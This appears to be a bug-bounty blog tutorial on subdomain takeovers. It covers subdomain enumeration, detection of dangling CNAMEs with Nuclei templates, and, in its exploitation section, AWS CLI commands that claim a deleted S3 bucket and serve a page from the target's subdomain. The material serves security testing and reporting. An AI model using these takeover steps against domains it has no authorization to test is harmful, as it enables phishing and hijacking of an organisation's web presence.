Subdomain takeovers are recon goldmines. One abandoned DNS record — pointing to a dead S3 bucket, Azure Blob, or GitHub page — can give you full control over a target’s subdomain. In bug bounty, this is a money category: it scales, it’s automation-friendly, and companies pay because it undermines trust in their brand.

What is a Subdomain Takeover?

• Occurs when a DNS record points to a third-party service that is no longer claimed.

• Examples:

  • test.company.com → CNAME → test-bucket.s3.amazonaws.com (bucket deleted).

  • blog.company.com → CNAME → company.github.io (repo removed).

  • files.company.com → CNAME → company.azurewebsites.net (site deleted).

• If the resource is unclaimed, you register it → instant control of the subdomain.

Recon Workflow

# 1. Subdomain enumeration
subfinder -d target.com -all -o subs.txt
amass enum -passive -d target.com -o amass.txt
cat subs.txt amass.txt | sort -u > all_subs.txt

# 2. Resolve to check which are alive
httpx -l all_subs.txt -status-code -title -tech-detect -o hosts.txt

# 3. Look for dangling CNAMEs
dig CNAME sub.target.com
nslookup sub.target.com

Signs of vulnerability:

• “NoSuchBucket” (AWS S3)

• “Repository not found” (GitHub Pages)

• “Site not found” (Azure/Heroku/Cloudfront)

Automation / Templates

With Nuclei:

nuclei -l all_subs.txt -t nuclei-templates/takeovers/ -o takeover-findings.txt

Nuclei ships with community templates for common providers (S3, Azure, Fastly, Shopify).

Exploitation

If sub.target.com points to company-test.s3.amazonaws.com and the bucket doesn’t exist:

# Claim the bucket
aws s3 mb s3://company-test --region us-east-1
# Upload a simple HTML page
echo "<h1>Owned by ToxSec</h1>" > index.html
aws s3 cp index.html s3://company-test/ --acl public-read

Now visiting sub.target.com serves your payload. That’s game over.

Real Bug Bounty Context

• High trust impact: hijacked subdomains can host phishing kits, malware, or fake login portals.

• Low skill floor, but automation weeds out duplicates fast.

• Bounty triagers like these because they’re reproducible and easy to verify.

Pro tip: Always grab proof of concept (PoC) — a simple index.html with text like “ToxSec PoC: DO NOT REMOVE” — and report. Don’t leave anything weaponized.

References

• EdOverflow’s Subdomain Takeover Guide: https://edoverflow.com/2017/10/13/what-is-a-subdomain-takeover/

• Nuclei Templates: https://github.com/projectdiscovery/nuclei-templates

• OWASP DNS Misconfig Testing: https://owasp.org/www-community/vulnerabilities/Testing_for_DNS_Misconfiguration

Command Recap

subfinder -d target.com -all -o subs.txt
amass enum -passive -d target.com -o amass.txt
cat subs.txt amass.txt | sort -u > all_subs.txt

httpx -l all_subs.txt -status-code -title -tech-detect -o hosts.txt
dig CNAME sub.target.com
nuclei -l all_subs.txt -t nuclei-templates/takeovers/ -o takeover-findings.txt

Final Thoughts
One dead pointer, one claimed resource, and suddenly you own their brand. Subdomain takeovers are a recon hunter’s payday — low effort, high visibility, and always worth scanning for.